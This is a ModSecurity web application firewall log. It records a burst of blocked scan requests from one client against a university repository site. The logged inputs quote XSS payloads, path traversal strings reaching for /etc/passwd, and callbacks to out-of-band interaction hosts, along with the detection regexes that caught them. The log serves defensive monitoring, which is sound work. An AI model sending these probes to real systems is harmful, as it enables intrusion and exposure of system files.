[Tue Aug 29 11:53:56.616126 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAoUJe0AAAAB"]
[Tue Aug 29 11:53:57.572955 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAolKb0AAAAe"]
[Tue Aug 29 11:54:00.599803 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoGFhcAAAAE"]
[Tue Aug 29 11:54:00.631343 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApHRYAAAAAP"]
[Tue Aug 29 11:54:00.744255 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAo2m9AAAAAA"]
[Tue Aug 29 11:54:00.747423 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAofnAoAAAAX"]
[Tue Aug 29 11:54:01.632406 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApJDWgAAAAY"]
[Tue Aug 29 11:54:02.652243 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApLWmgAAAAI"]
[Tue Aug 29 11:54:04.852442 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAApQ2XQAAAAb"]
[Tue Aug 29 11:54:04.889667 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAolKdoAAAAe"]
[Tue Aug 29 11:54:08.196242 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApbUQQAAAAh"]
[Tue Aug 29 11:54:08.667598 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApV2yoAAAAJ"]
[Tue Aug 29 11:54:09.956709 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApXgasAAAAU"]
[Tue Aug 29 11:54:11.003830 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1588Co-f0AAAoZ6ZcAAAAK"]
[Tue Aug 29 11:54:11.567612 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAph8s8AAAAj"]
[Tue Aug 29 11:54:12.871078 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0hm4gimi9tqtqx.oast.site found within TX:1: cjmnijtjmimvgniikdb0hm4gimi9tqtqx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApjILwAAAAm"]
[Tue Aug 29 11:54:14.147771 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApd2F8AAAAi"]
[Tue Aug 29 11:54:14.602794 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApl99AAAAAo"]
[Tue Aug 29 11:54:14.686993 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAph8uMAAAAj"]
[Tue Aug 29 11:54:14.687815 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApa-CAAAAAg"]
[Tue Aug 29 11:54:15.562861 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAoUJiQAAAAB"]
[Tue Aug 29 11:54:16.599770 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApgAykAAAAH"]
[Tue Aug 29 11:54:16.612154 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApV21AAAAAJ"]
[Tue Aug 29 11:54:20.841681 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApXgcEAAAAU"]
[Tue Aug 29 11:54:20.918301 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoGFlIAAAAE"]
[Tue Aug 29 11:54:22.779862 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-sCo-f0AAApV21sAAAAJ"]
[Tue Aug 29 11:54:22.886251 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAnHQxMAAAAT"]
[Tue Aug 29 11:54:23.899577 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApmXukAAAAp"]
[Tue Aug 29 11:54:25.074327 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAp0OE4AAAAI"]
[Tue Aug 29 11:54:27.151561 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqSwhgAAAAN"]
[Tue Aug 29 11:54:27.571958 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqY54gAAAAr"]
